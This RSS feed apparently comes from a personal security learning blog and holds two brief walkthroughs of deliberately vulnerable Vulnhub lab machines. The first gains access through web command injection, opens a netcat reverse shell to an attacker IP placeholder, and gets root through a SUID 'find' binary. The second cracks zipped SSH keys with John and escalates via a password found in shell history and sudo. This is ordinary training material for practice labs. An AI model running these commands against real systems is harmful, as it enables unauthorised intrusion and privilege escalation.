<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>vulnhub &amp;mdash; drsh0&#39;s llog</title>
    <link>https://drsh0.writeas.com/tag:vulnhub</link>
    <description>my learning log; notes on cybersec activities, ctfs, and ill-equipped cyber adventures. Consume responsibly.</description>
    <pubDate>Sun, 26 Apr 2026 19:37:02 +0000</pubDate>
    <image>
      <url>https://i.snap.as/v7Oo2ci6.png</url>
      <title>vulnhub &amp;mdash; drsh0&#39;s llog</title>
      <link>https://drsh0.writeas.com/tag:vulnhub</link>
    </image>
    <item>
      <title>Vulnhub - BossPlayers CTF</title>
      <link>https://drsh0.writeas.com/vulnhub-bossplayers-ctf?pk_campaign=rss-feed</link>
      <description>&lt;![CDATA[URI: https://www.vulnhub.com/entry/bossplayersctf-1,375/&#xA;Difficulty: Easy&#xA;&#xA;  Aimed at Beginner Security Professionals who want to get their feet wet into doing some CTF&#39;s. It should take around 30 minutes to root.&#xA;&#xA;!--more--&#xA;&#xA;enum&#xA;&#xA;nmap&#xA;ssh + http; not much else to be seen here&#xA;webpage enumerate: robots.txt, index html source&#xA;find directory via index source (html comment)&#xA;&#xA;exploit&#xA;&#xA;it appears that the original developer wanted to ping via a web service on the server&#xA;try common terms used for this e.g ?command= or ?exec=&#xA;?cmd=id works; also looks like we have nc (which nc)&#xA;listener: rlwrap ncat -nlvp $PORT&#xA;reverse shell: nc -e /bin/sh $ATTACKING-IP $PORT &#xA;we&#39;re in with user www-data&#xA;grab user flag&#xA;&#xA;privesc&#xA;&#xA;spawn a tty (we have python): python -c &#39;import pty; pty.spawn(&#34;/bin/sh&#34;)&#39;&#xA;look for SUID binaries: find / -user root -perm -4000 -print 2  /dev/null&#xA;notable binaries: grep and find&#xA;both have entries on gtfobins&#xA;use find to spawn a root shell:&#xA;&#xA;find . -exec /bin/sh -p \; -quit&#xA;grab root flag&#xA;&#xA;#vulnhub #php #suid]]&gt;</description>
      <content:encoded><![CDATA[<p>URI: <a href="https://www.vulnhub.com/entry/bossplayersctf-1,375/" rel="nofollow">https://www.vulnhub.com/entry/bossplayersctf-1,375/</a>
Difficulty: Easy</p>

<blockquote><p>Aimed at Beginner Security Professionals who want to get their feet wet into doing some CTF&#39;s. It should take around 30 minutes to root.</p></blockquote>



<h2 id="enum" id="enum">enum</h2>
<ul><li>nmap</li>
<li>ssh + http; not much else to be seen here</li>
<li>webpage enumerate: robots.txt, index html source</li>
<li>find directory via index source (html comment)</li></ul>

<h2 id="exploit" id="exploit">exploit</h2>
<ul><li>it appears that the original developer wanted to ping via a web service on the server</li>
<li>try common terms used for this e.g <code>?command=</code> or <code>?exec=</code></li>
<li><code>?cmd=id</code> works; also looks like we have nc (<code>which nc</code>)</li>
<li>listener: <code>rlwrap ncat -nlvp $PORT</code></li>
<li>reverse shell: nc -e /bin/sh $ATTACKING-IP $PORT</li>
<li>we&#39;re in with user <code>www-data</code></li>
<li>grab user flag</li></ul>

<h2 id="privesc" id="privesc">privesc</h2>
<ul><li>spawn a tty (we have python): <code>python -c &#39;import pty; pty.spawn(&#34;/bin/sh&#34;)&#39;</code></li>
<li>look for SUID binaries: <code>find / -user root -perm -4000 -print 2&gt;/dev/null</code></li>
<li>notable binaries: <code>grep</code> and <code>find</code></li>
<li>both have entries on <a href="https://gtfobins.github.io/" rel="nofollow">gtfobins</a></li>
<li>use <code>find</code> to spawn a root shell:</li></ul>

<pre><code class="language-bash">find . -exec /bin/sh -p \; -quit
</code></pre>
<ul><li>grab root flag</li></ul>

<p><a href="https://drsh0.writeas.com/tag:vulnhub" class="hashtag" rel="nofollow"><span>#</span><span class="p-category">vulnhub</span></a> <a href="https://drsh0.writeas.com/tag:php" class="hashtag" rel="nofollow"><span>#</span><span class="p-category">php</span></a> <a href="https://drsh0.writeas.com/tag:suid" class="hashtag" rel="nofollow"><span>#</span><span class="p-category">suid</span></a></p>
]]></content:encoded>
      <guid>https://drsh0.writeas.com/vulnhub-bossplayers-ctf</guid>
      <pubDate>Thu, 10 Dec 2020 12:00:07 +0000</pubDate>
    </item>
    <item>
      <title>Vulnhub - Funbox Rookie</title>
      <link>https://drsh0.writeas.com/vulnhub-funbox-rookie?pk_campaign=rss-feed</link>
      <description>&lt;![CDATA[URI: https://www.vulnhub.com/entry/funbox-2-rockie,520/&#xA;Difficulty: Easy&#xA;&#xA;  Boot2Root ! This can be a real life scenario if rockies becomes admins. Easy going in round about 15 mins. Bit more, if you are find and stuck in the rabbit-hole first.&#xA;&#xA;!--more--&#xA;&#xA;enumeration&#xA;&#xA;nmap&#xA;find anon ftp access&#xA;get all zip files - they contain idrsa keys but are password protected&#xA;&#xA;initial access&#xA;&#xA;use /usr/sbin/zip2john to get hashes of all zip files&#xA;use john to crack these hashes using your favourite wordlist&#xA;user tom&#39;s zip file could be successfully cracked&#xA;extract idrsa with password&#xA;chmod 600 idrsa &amp;&amp; ssh -i idrsa $VulnHubIP -v&#xA;we&#39;re in 🔓&#xA;grab local.txt&#xA;&#xA;privesc&#xA;&#xA;sudo -l - prompted for tom&#39;s password which we don&#39;t have yet&#xA;check all files in directory ls -la&#xA;investigate .bashhistory and .mysqlhistory&#xA;looks like we see a password in mysql history&#xA;we have excessive sudo privileges&#xA;sudo su -l and grab proof.txt 🔚&#xA;&#xA;#vulnhub #ssh #sudo]]&gt;</description>
      <content:encoded><![CDATA[<p>URI: <a href="https://www.vulnhub.com/entry/funbox-2-rockie,520/" rel="nofollow">https://www.vulnhub.com/entry/funbox-2-rockie,520/</a>
Difficulty: Easy</p>

<blockquote><p>Boot2Root ! This can be a real life scenario if rockies becomes admins. Easy going in round about 15 mins. Bit more, if you are find and stuck in the rabbit-hole first.</p></blockquote>



<h2 id="enumeration" id="enumeration">enumeration</h2>
<ul><li>nmap</li>
<li>find anon ftp access</li>
<li>get all zip files – they contain <code>id_rsa</code> keys but are password protected</li></ul>

<h2 id="initial-access" id="initial-access">initial access</h2>
<ul><li>use <code>/usr/sbin/zip2john</code> to get hashes of all zip files</li>
<li>use <code>john</code> to crack these hashes using your favourite wordlist</li>
<li>user <strong>tom</strong>&#39;s zip file could be successfully cracked</li>
<li>extract <code>id_rsa</code> with password</li>
<li><code>chmod 600 id_rsa &amp;&amp; ssh -i id_rsa $VulnHubIP -v</code></li>
<li>we&#39;re in 🔓</li>
<li>grab <code>local.txt</code></li></ul>

<h2 id="privesc" id="privesc">privesc</h2>
<ul><li><code>sudo -l</code> – prompted for tom&#39;s password which we don&#39;t have yet</li>
<li>check all files in directory <code>ls -la</code></li>
<li>investigate <code>.bash_history</code> and <code>.mysql_history</code></li>
<li>looks like we see a password in mysql history</li>
<li>we have excessive sudo privileges</li>
<li><strong><code>sudo su -l</code> and grab <code>proof.txt</code> 🔚</strong></li></ul>

<p><a href="https://drsh0.writeas.com/tag:vulnhub" class="hashtag" rel="nofollow"><span>#</span><span class="p-category">vulnhub</span></a> <a href="https://drsh0.writeas.com/tag:ssh" class="hashtag" rel="nofollow"><span>#</span><span class="p-category">ssh</span></a> <a href="https://drsh0.writeas.com/tag:sudo" class="hashtag" rel="nofollow"><span>#</span><span class="p-category">sudo</span></a></p>
]]></content:encoded>
      <guid>https://drsh0.writeas.com/vulnhub-funbox-rookie</guid>
      <pubDate>Thu, 10 Dec 2020 07:48:25 +0000</pubDate>
    </item>
  </channel>
</rss>